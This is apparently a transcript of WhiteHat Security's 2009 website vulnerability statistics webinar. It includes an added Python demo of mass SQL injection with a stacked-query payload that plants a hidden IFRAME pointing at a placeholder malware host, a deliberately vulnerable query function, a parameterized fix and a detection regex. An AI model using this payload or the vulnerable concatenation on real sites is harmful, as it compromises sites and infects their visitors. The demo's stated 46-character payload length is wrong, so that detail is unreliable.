whitehat security "website security statistics report" (q1'09)
DESCRIPTION
The WhiteHat Website Security Statistics Report provides a one-of-a-kind perspective on the state of website security and the issues that organizations must address to avert attack. WhiteHat has been publishing the report, which highlights the top ten vulnerabilities, vertical market trends and new attack vectors, since 2006. The WhiteHat report presents a statistical picture of current website vulnerabilities, accompanied by WhiteHat expert analysis and recommendations. WhiteHat's report is the only one in the industry to focus solely on unknown vulnerabilities in custom Web applications, code unique to an organization, within real-world websites.
TRANSCRIPT
© 2009 WhiteHat, Inc.
Jeremiah Grossman, Founder & Chief Technology Officer
7th Website Security Statistics Report
Webinar 05.19.2009
WhiteHat Security
• 200+ enterprise customers
• Start-ups to Fortune 500
• Flagship offering: "WhiteHat Sentinel Service"
• 1000's of assessments performed annually
• Recognized leader in website security
• Quoted hundreds of times by the mainstream press
Web Security #1 Threat
• The vast majority of websites possess serious vulnerabilities
• Malicious website breaches are occurring in record numbers
"82% of websites have had at least one security issue, with 63 percent still having issues of high, critical or urgent severity." (WhiteHat Security, 2008)
"70% of the top 100 most popular Web sites either hosted malicious content or contained a masked redirect to lure unsuspecting victims from legitimate sites to malicious sites." (Websense, 2009)
PCI DSS Requirement 6.6 mandates application security: "Ensure that web-facing applications are protected against known attacks by applying either of the following methods. A) Having all custom application code reviewed for common vulnerabilities by an organization that specializes in application security.
Federal Trade Commission Fines and Investigations: Over the last three years, the FTC has settled with fourteen businesses over alleged inadequate data security practices concerning how such businesses protect consumers' personal information.
WhiteHat Security - Website Risk Management
• WhiteHat Sentinel Service
• Unlimited website vulnerability assessment
• SaaS-based, annual subscription model
• Combination of proprietary scanning technology and expert operations team
• 200+ enterprise customers
• 1000's of assessments performed annually, from start-ups to Fortune 500
Sentinel PE - Configured assessment delivery including comprehensive manual testing for business logic issues. For high-risk websites that hold sensitive data and perform critical business functions.
Sentinel SE - Configured assessment delivery with verified vulnerability reporting, designed for medium-risk websites with complex functionality requiring extensive configuration.
Sentinel BE - Self-service, automated assessment delivery with verified vulnerability reporting, designed for smaller, less complex, lower-risk websites.
WASC 24 (+2)* Classes of Attacks

Technical: Automation Can Identify
Command Execution
• Buffer Overflow
• Format String Attack
• LDAP Injection
• OS Commanding
• SQL Injection
• SSI Injection
• XPath Injection
Information Disclosure
• Directory Indexing
• Information Leakage
• Path Traversal
• Predictable Resource Location
Client-Side
• Content Spoofing
• Cross-site Scripting
• HTTP Response Splitting*

Business Logic: Humans Required
Authentication
• Brute Force
• Insufficient Authentication
• Weak Password Recovery Validation
• CSRF*
Authorization
• Credential/Session Prediction
• Insufficient Authorization
• Insufficient Session Expiration
• Session Fixation
Logical Attacks
• Abuse of Functionality
• Denial of Service
• Insufficient Anti-automation
• Insufficient Process Validation
Data Set
• Collection duration: January 1, 2006 to March 31, 2009
• Total websites: 1,031
• Identified vulnerabilities (custom web applications): 17,888
• Assessment frequency: ~Weekly
• Vulnerability classes: WASC Threat Classification
• Severity naming convention: PCI-DSS

Key Findings
• Unresolved vulnerabilities: 7,157 (60% resolution rate)
• Websites having had at least one HIGH, CRITICAL, or URGENT issue: 82%
• Lifetime average number of vulnerabilities per website: 17
• Websites currently with at least one HIGH, CRITICAL, or URGENT issue: 63%
• Current average of unresolved vulnerabilities per website: 7

Chart: Percentage likelihood of a website having a vulnerability by severity (URGENT, CRITICAL, HIGH); values are not in the transcript.
WhiteHat Security Top Ten
Chart: Percentage likelihood of a website having a vulnerability by class (values are not in the transcript). Classes, in rank order:
1. Cross-Site Scripting
2. Information Leakage
3. Content Spoofing
4. Insufficient Authorization
5. SQL Injection
6. Predictable Resource Location
7. Session Fixation
8. Cross-Site Request Forgery
9. Insufficient Authentication
10. HTTP Response Splitting
• Average number of inputs per website: 227
• Average ratio of vulnerability count / number of inputs: 2.58%
Overall Vulnerability Population
URL Extension   % of websites   % of vulnerabilities
unknown         59%             40%
asp             24%             25%
aspx            23%             9%
xml             10%             2%
jsp             9%              8%
do              7%              3%
php             6%              3%
html            4%              2%
old             4%              1%
dll             4%              1%
cfm             3%              4%
Industry Vertical Analysis
Chart: Percentage likelihood of a website having at least one HIGH, CRITICAL, or URGENT issue by industry vertical, Historical vs Current, with the decrease between the two marked. Verticals: Retail, Financial Services, IT, Healthcare, Pharmaceutical, Telecom, Insurance, Social Networking. Values are not in the transcript.
Chart: Top 5 vulnerabilities by industry vertical. Percentage likelihood of a website having at least one HIGH, CRITICAL, or URGENT issue by class, Historical vs Current, for each of the eight verticals above. Values are not in the transcript.
Time-to-Fix (Days) - WhiteHat Top Ten
Best-case scenario: not all vulnerabilities have been fixed...
Chart: time-to-fix in days for each of the WhiteHat Top Ten classes (Cross-Site Scripting, Information Leakage, Content Spoofing, Insufficient Authorization, SQL Injection, Predictable Resource Location, Session Fixation, Cross-Site Request Forgery, Insufficient Authentication, HTTP Response Splitting); values are not in the transcript.
Resolution rate - Top 5 by Severity

Class of Attack                 % resolved   Severity
Cross-Site Scripting            20%          urgent
Insufficient Authorization      19%          urgent
SQL Injection                   30%          urgent
HTTP Response Splitting         75%          urgent
Directory Traversal             53%          urgent
Insufficient Authentication     38%          critical
Cross-Site Scripting            39%          critical
Abuse of Functionality          28%          critical
Cross-Site Request Forgery      45%          critical
Session Fixation                21%          critical
Brute Force                     11%          high
Content Spoofing                25%          high
HTTP Response Splitting         30%          high
Information Leakage             29%          high
Predictable Resource Location   26%          high
The Long Tail of Website Vulnerability Testing
Chart: Verified Vulnerabilities (y axis, 0 to 3,000) per Vulnerability Check (x axis).
Chart: Vulnerable Websites (y axis, 0 to 400) per Vulnerability Check (x axis).
Threats / Attackers
'The Analyzer' allegedly hacked into multiple financial institutions using SQL Injection to steal credit and debit card numbers, which were then used by thieves in several countries to withdraw more than $1 million from ATMs. Other SQL Injection breaches: Geeks.com, Guess, Petco, CardSystems, USC, etc.
Cyber criminals use XSS vulnerabilities to create very convincing phishing scams that appear on the real website rather than on a fake one. JavaScript malware steals victims' session cookies and passwords. Examples: Y! Mail, PayPal, SunTrust, Italian banks, etc.
With mass SQL Injection, automated worms insert malicious JavaScript IFRAMEs (pointing to malware servers) into back-end databases, so that the compromised legitimate site serves the IFRAMEs to its visitors and exploits unpatched web browsers. According to Websense, "75 percent of Web sites with malicious code are legitimate sites that have been compromised."
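The mass SQL Injection mechanism described above, reduced to a runnable illustration. This is an added example, not code from the webinar or from WhiteHat: it builds a constructed two-page content table in an in-memory SQLite database, shows a search routine that concatenates user input into SQL (the stacked-query payload appends an IFRAME to every stored page body, which the site then serves to visitors), then the parameterized version that binds the same input as a plain value, and a defensive check that lists stored pages carrying off-site IFRAME or SCRIPT tags. The hostname malware.example is a placeholder, and sqlite3's executescript() stands in for a driver that runs stacked statements, since its execute() refuses more than one statement.

```python
import re
import sqlite3

# Constructed sample content table for a small CMS (not real data).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        INSERT INTO pages (title, body) VALUES ('Home', '<p>Welcome</p>');
        INSERT INTO pages (title, body) VALUES ('About', '<p>About us</p>');
    """)
    return conn

# Hypothetical injected tag; malware.example is a placeholder, not a real host.
INJECTED_TAG = '<iframe src="http://malware.example/" width=0 height=0></iframe>'

# Stacked-query payload: close the string literal, append an UPDATE that
# concatenates the IFRAME onto every page body, then comment out the rest
# of the original statement with '--'.
PAYLOAD = "x'; UPDATE pages SET body = body || '" + INJECTED_TAG + "'; --"


def search_vulnerable(conn, title):
    """Deliberately vulnerable: the title is pasted into the SQL text.

    executescript() is an assumption standing in for a database driver that
    executes every ';'-separated statement it is handed (stacked queries);
    result rows are discarded because only the side effect matters here.
    """
    sql = "SELECT id, title FROM pages WHERE title = '" + title + "';"
    conn.executescript(sql)


def search_hardened(conn, title):
    """Parameterized query: the input is bound as a value, never parsed as SQL."""
    return conn.execute(
        "SELECT id, title FROM pages WHERE title = ?", (title,)
    ).fetchall()


def injected_pages(conn):
    """Post-incident check: pages whose stored body carries an IFRAME or
    SCRIPT tag whose src points at an absolute http(s) URL."""
    pattern = re.compile(r'<(iframe|script)[^>]+src=["\']?https?://', re.I)
    rows = conn.execute("SELECT id, title, body FROM pages").fetchall()
    return [(page_id, title) for page_id, title, body in rows if pattern.search(body)]


def demo_vulnerable():
    """Run the payload through the concatenating search; returns how many
    of the two pages now carry the injected IFRAME."""
    conn = make_db()
    search_vulnerable(conn, PAYLOAD)
    return len(injected_pages(conn))


def demo_hardened():
    """Run the same payload through the parameterized search; returns
    (rows matched, pages injected)."""
    conn = make_db()
    rows = search_hardened(conn, PAYLOAD)
    return len(rows), len(injected_pages(conn))


if __name__ == "__main__":
    print("concatenated SQL: pages injected =", demo_vulnerable())
    print("parameterized SQL: (matches, pages injected) =", demo_hardened())
```

The parameterized version does not merely fail to match: the payload reaches the database as a 46-character title value and cannot change the statement's shape, which is why the injected_pages() sweep stays empty. That sweep is the check to run across real content tables after an incident of this kind, since the worms described above touch every text column they can reach rather than a single page.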
Threat Capabilities

Fully Targeted
• Discover unlinked / hidden functionality
• Exercise business processes
• Customize business logic flaw exploits
• Leverage information leakage
• Interact with other customers
• Perform multi-stage attacks

Directed Opportunistic
• Authenticated crawling
• Authenticated attacks
• Intelligent HTML form submission
• Test for technical vulnerabilities
• Customize exploits
• SQL Injection (data extraction)
• Cross-Site Scripting (phishing)

Random Opportunistic
• Unauthenticated crawling
• Unauthenticated attacks
• Test all attack surface discovered
• Destructive attacks
• Automated HTML form submission
• SQL Injection (code insertion)
• Persistent Cross-Site Scripting
• Advanced filter evasion techniques
• Generic exploits
1) Where do I start? Locate the websites you are responsible for.
2) What do I do next? Rank websites based upon business criticality.
3) What should I be concerned about first? Random Opportunistic, Directed Opportunistic, Fully Targeted, in that order.
4) What is our current security posture? Vulnerability assessments, pen-tests, traffic monitoring.
5) How best to improve our survivability? SDL, virtual patch, configuration change, decommission, outsource, version roll-back, etc.
Operationalizing Website Security
Chart: Resources against Risk. What is your organization's tolerance for risk (per website)?
Website Risk Management Infrastructure
Jeremiah Grossman
Blog: http://jeremiahgrossman.blogspot.com/
Twitter: http://twitter.com/jeremiahg
Email: [email protected]
WhiteHat Security
http://www.whitehatsec.com/
Thank You!